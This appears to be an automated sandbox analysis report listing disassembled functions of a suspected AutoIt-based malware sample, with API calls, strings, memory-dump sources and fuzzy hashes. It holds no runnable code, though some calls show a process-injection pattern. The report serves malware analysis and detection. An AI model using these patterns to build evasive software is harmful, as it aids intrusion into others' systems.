Instruction Fuzzy Hash: D2F03A716006D07EEA305B63AC89EBB3F7DD7C7F54B00012ABB00AB171CA710840CAB0

Function 00B2F76F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 168
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B40162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B40193
Part of subcall function 00B40162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00B4019B
Part of subcall function 00B40162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B401A6
Part of subcall function 00B40162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B401B1
Part of subcall function 00B40162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00B401B9
Part of subcall function 00B40162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00B401C1

Part of subcall function 00B360F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00B2F930), ref: 00B36154

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00B2F9CD
OleInitialize.OLE32(00000000), ref: 00B2FA4A
CloseHandle.KERNEL32(00000000), ref: 00B645C8

Strings

x!, xrefs: 00B2F81A
p~, xrefs: 00B2F7EB

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: p~$x!
API String ID: 1986988660-4026285259
Opcode ID: e0de6486163d4d125e2051ebf5a44df6d579e7138aa84c43c47d1871cc157284
Instruction ID: a50eb32cd556f96e1b56d4b67feb323449e2a89d8e3d772a5ea7984b834ff1e5
Opcode Fuzzy Hash: e0de6486163d4d125e2051ebf5a44df6d579e7138aa84c43c47d1871cc157284
Instruction Fuzzy Hash: 3781CFB1901AC18FC3A4DF29A9C16697BF5FB5830E75081AAD119CF3A9EF7044848F25

Function 00D5E970 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 144
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D5E860: Sleep.KERNELBASE(000001F4), ref: 00D5E871

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00D5EA92

Strings

FDFDVACR0ADRBC, xrefs: 00D5EAF5, 00D5EAF8

Memory Dump Source

Source File: 00000000.00000002.1429359956.0000000000D5C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D5C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d5c000_WBI835q8qr.jbxd

Similarity

API ID: CreateFileSleep
String ID: FDFDVACR0ADRBC
API String ID: 2694422964-4122862678
Opcode ID: 7152e4d2cc9670a721ab1ac84504cbced44afca46d174945796f4fc4c5956508
Instruction ID: abaec006248ae6346950975cede36b01f54b17e88a81c2d22d475b3dda0d1c8a
Opcode Fuzzy Hash: 7152e4d2cc9670a721ab1ac84504cbced44afca46d174945796f4fc4c5956508
Instruction Fuzzy Hash: FE51A070D04248EBEF14EBA4C855BEEBB75AF14301F004199EA09BB2C0D7B95B48CBB5

Function 00B2407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00B5D3D7

Part of subcall function 00B27BCC: _memmove.LIBCMT ref: 00B27C06

_memset.LIBCMT ref: 00B240FC
_wcscpy.LIBCMT ref: 00B24150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B24160

Strings

Line: , xrefs: 00B5D400

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: 4b1979017f33703b2d54ffacef8dc0a082b656184145a8a753b3251db0b6d63d
Instruction ID: 2ba3c65fba5ca12fb644a04bf51ce6d5790b1c5497aad1612f2032478cefd30e
Opcode Fuzzy Hash: 4b1979017f33703b2d54ffacef8dc0a082b656184145a8a753b3251db0b6d63d
Instruction Fuzzy Hash: 8931B071008755AAD730EB60EC86FDB77D8AF44304F10499AF689960A1DF70A649C796

Function 00B2686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00B24DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00BE52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B24E0F

_free.LIBCMT ref: 00B5E263
_free.LIBCMT ref: 00B5E2AA

Part of subcall function 00B26A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00B26BAD

Strings

Bad directive syntax error, xrefs: 00B5E292
>>>AUTOIT SCRIPT<<<, xrefs: 00B5E039

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: 64d0f27d4c9e3adcabfcdfeed27c51681b61e37ce9b3978cc30a08e798225bfe
Instruction ID: 04ad038d8a59bde16a4d96540427d5cf492b56b97a9b4ca5a01397951802b8a4
Opcode Fuzzy Hash: 64d0f27d4c9e3adcabfcdfeed27c51681b61e37ce9b3978cc30a08e798225bfe
Instruction Fuzzy Hash: 37916B719142299FCF18EFA4D8819EDB7F4FF09311F1444EAE825AB2A1DB71DA05CB50

Function 00B235B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00B235A1,SwapMouseButtons,00000004,?), ref: 00B235D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00B235A1,SwapMouseButtons,00000004,?,?,?,?,00B22754), ref: 00B235F5
RegCloseKey.KERNELBASE(00000000,?,?,00B235A1,SwapMouseButtons,00000004,?,?,?,?,00B22754), ref: 00B23617

Strings

Control Panel\Mouse, xrefs: 00B235D2

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 4b797d67cf40deb43061780dbb83391a53832cd9703deb81a8ab354b6fe09aff
Instruction ID: 6e0c83022560f3c93ca042eb6965cb9332a1a609be92e77bd3d36a90c7b163b9
Opcode Fuzzy Hash: 4b797d67cf40deb43061780dbb83391a53832cd9703deb81a8ab354b6fe09aff
Instruction Fuzzy Hash: 28114871614228BFDB228FA4EC81AFEB7FCEF05B40F0144A9E809D7210E6719E409B60

Function 00D5D860 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00D5E01B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D5E0B1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D5E0D3

Memory Dump Source

Source File: 00000000.00000002.1429359956.0000000000D5C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D5C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d5c000_WBI835q8qr.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
Instruction ID: a277c6c9764b99ccadb02a769d0eef61e441bbce27624f80fb510acb35bce4c2
Opcode Fuzzy Hash: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
Instruction Fuzzy Hash: 11622C30A14618DBEB24DFA4C840BDEB376EF58301F1091A9D90DEB390E7759E85CB69

Function 00B8955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00B24EE5: _fseek.LIBCMT ref: 00B24EFD

Part of subcall function 00B89734: _wcscmp.LIBCMT ref: 00B89824
Part of subcall function 00B89734: _wcscmp.LIBCMT ref: 00B89837

_free.LIBCMT ref: 00B896A2
_free.LIBCMT ref: 00B896A9
_free.LIBCMT ref: 00B89714

Part of subcall function 00B42D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00B49A24), ref: 00B42D69
Part of subcall function 00B42D55: GetLastError.KERNEL32(00000000,?,00B49A24), ref: 00B42D7B

_free.LIBCMT ref: 00B8971C

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction ID: 9eeba91a78ef74a1b460b30b135a5fd70a170604075037fe02c2df9dfcde1c05
Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction Fuzzy Hash: A6513FB1D04258ABDF249F64DC85AAEBBB9EF48300F1444EEF60DA3251DB715A80CF58

Function 00B4470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B447A0
__flush.LIBCMT ref: 00B447C0
__write.LIBCMT ref: 00B447F3
__flsbuf.LIBCMT ref: 00B44821

Part of subcall function 00B48B28: __getptd_noexit.LIBCMT ref: 00B48B28

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction ID: 0122215afb3ca187a0a686b55dfc61fee27561cda9cfbb074f054919418befd6
Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction Fuzzy Hash: D041C475B00745ABDB18CF69C8C0AAE77E5EF42364B2485BDE815C7640EB70DF62AB40

Function 00B27285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B5EA39
GetOpenFileNameW.COMDLG32(?), ref: 00B5EA83

Part of subcall function 00B24750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B24743,?,?,00B237AE,?), ref: 00B24770

Part of subcall function 00B40791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B407B0

Strings

X, xrefs: 00B5EA51

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 252dec8fca1e5bce1b761a8dc4abf48acf9b11341a8228168d84c3247d759e54
Instruction ID: 2fbe55c54d553ba5d476a657b2b8da0a44ad96fd1440fa7bde856e71dbc7cede
Opcode Fuzzy Hash: 252dec8fca1e5bce1b761a8dc4abf48acf9b11341a8228168d84c3247d759e54
Instruction Fuzzy Hash: 5821D531A102589BCB11DF94D845BEEBBF8AF49315F00409AF908BB241DFB45A8D8FA1

Function 00B898E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00B898F8
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00B8990F

Strings

aut, xrefs: 00B89909

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: d21e56dbd88394c010a3b9fbe6be17ea9f222a74b5d3dab3768891888e9510f1
Instruction ID: b9c55229953c77022a180ec5f97fa571555ba6cc3384286a7fad585aaa1e61ee
Opcode Fuzzy Hash: d21e56dbd88394c010a3b9fbe6be17ea9f222a74b5d3dab3768891888e9510f1
Instruction Fuzzy Hash: 0FD05E7994030EABDB509BE0DC0EFEAB77CE704701F0002B1BA94921A1EEB195988B91

Function 00B9CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21cc65f7c1c1fbae37f6266d4b30ffb5118479b271ae5109e0aeea4dae07e0f6
Instruction ID: 8a6ff5e093d0ea581e9e4e51a74b4666f023d7c573ffe8e4feaf3d194eef2840
Opcode Fuzzy Hash: 21cc65f7c1c1fbae37f6266d4b30ffb5118479b271ae5109e0aeea4dae07e0f6
Instruction Fuzzy Hash: 39F138716083059FCB14DF28C480A6ABBE5FF89314F5489AEF8999B352D730E945CF82

Function 00B2434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B24370
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B24415
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00B24432

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 48aa522a863378bb4369bbdaf7361bef83121d474bf456848401179b17ac5fa1
Instruction ID: d4f12bfc240b240a07b1b026c179afc792126610ac282446a43ef47fce7873ad
Opcode Fuzzy Hash: 48aa522a863378bb4369bbdaf7361bef83121d474bf456848401179b17ac5fa1
Instruction Fuzzy Hash: A0318FB05047118FD720EF24E88569BBBF8FB48309F00097EE69A87651EB70A944CB52

Function 00B4571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00B45733

Part of subcall function 00B4A16B: __NMSG_WRITE.LIBCMT ref: 00B4A192
Part of subcall function 00B4A16B: __NMSG_WRITE.LIBCMT ref: 00B4A19C

__NMSG_WRITE.LIBCMT ref: 00B4573A

Part of subcall function 00B4A1C8: GetModuleFileNameW.KERNEL32(00000000,00BE33BA,00000104,?,00000001,00000000), ref: 00B4A25A
Part of subcall function 00B4A1C8: ___crtMessageBoxW.LIBCMT ref: 00B4A308

Part of subcall function 00B4309F: ___crtCorExitProcess.LIBCMT ref: 00B430A5
Part of subcall function 00B4309F: ExitProcess.KERNEL32 ref: 00B430AE

Part of subcall function 00B48B28: __getptd_noexit.LIBCMT ref: 00B48B28

RtlAllocateHeap.NTDLL(00CB0000,00000000,00000001,00000000,?,?,?,00B40DD3,?), ref: 00B4575F

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: a9cf693b1f1ebb1357c593c931419cf8cf998d1717f58c8a97a1e4692b928882
Instruction ID: 5dead6085e50bc9b309c476168ec83cc27f47c7794e76f16864e28c22004025b
Opcode Fuzzy Hash: a9cf693b1f1ebb1357c593c931419cf8cf998d1717f58c8a97a1e4692b928882
Instruction Fuzzy Hash: FF01DE35240E02DFEA212B38AC86A6E73D8CF82B61F1005B5F515AB182DE708F017A62

Function 00B898A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00B89548,?,?,?,?,?,00000004), ref: 00B898BB
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00B89548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00B898D1
CloseHandle.KERNEL32(00000000,?,00B89548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00B898D8

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: a0a9f7167ff63c44efc5b94c59ed28fbb0d7471c009e2546f838f646792d8ec8
Instruction ID: a8cb55f5f909e75fa787823e17f3db2db1c09a8abfeeab4d86a7dc1520b6befd
Opcode Fuzzy Hash: a0a9f7167ff63c44efc5b94c59ed28fbb0d7471c009e2546f838f646792d8ec8
Instruction Fuzzy Hash: F9E08632240215BBDB312B94EC0AFEA7B59EB07B60F144120FB547A0E08BB119119798

Function 00B88D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00B88D1B

Part of subcall function 00B42D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00B49A24), ref: 00B42D69
Part of subcall function 00B42D55: GetLastError.KERNEL32(00000000,?,00B49A24), ref: 00B42D7B

_free.LIBCMT ref: 00B88D2C
_free.LIBCMT ref: 00B88D3E

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction ID: 0a8bb93f7bb23fd942f4824753107fad376c2c8e9118ec4d275b6b6363d1bd45
Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction Fuzzy Hash: A3E012A1A0160157CB24B678A940A9313DC8F58392F9409BDB40DD7196DE64F982E324

Function 00B2A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 00B5FC01

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: caa5c9fce51ea9783f10129d3d76431dac66ef26f5e35549a752bf709c65e6cc
Instruction ID: ab3a6a88edf7a1c0094c3619f18a1c87315dedbbc0d5cd583497707a48a8de39
Opcode Fuzzy Hash: caa5c9fce51ea9783f10129d3d76431dac66ef26f5e35549a752bf709c65e6cc
Instruction Fuzzy Hash: 31225970508321DFCB24DF14D494A6ABBE1FF49304F1489ADE89A9B362DB35ED45CB82

Function 00B24C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B24CBA

Strings

EA06, xrefs: 00B5D8CC

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: 5404461d505a1d3fe9061570000d610297a73da3692fee14dbc94cf28d06292c
Instruction ID: 84fc28ed6e0372d0f0454b72fd4d7b77f2525f61d143da37f64b34310e19bdfe
Opcode Fuzzy Hash: 5404461d505a1d3fe9061570000d610297a73da3692fee14dbc94cf28d06292c
Instruction Fuzzy Hash: 41418B21A0017867DF229B64F8917BE7BE2DB45340F2845F4EC8E9BA82D7209D4483A1

Function 00B877B3 Relevance: 3.1, APIs: 2, Instructions: 133COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B878DB

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
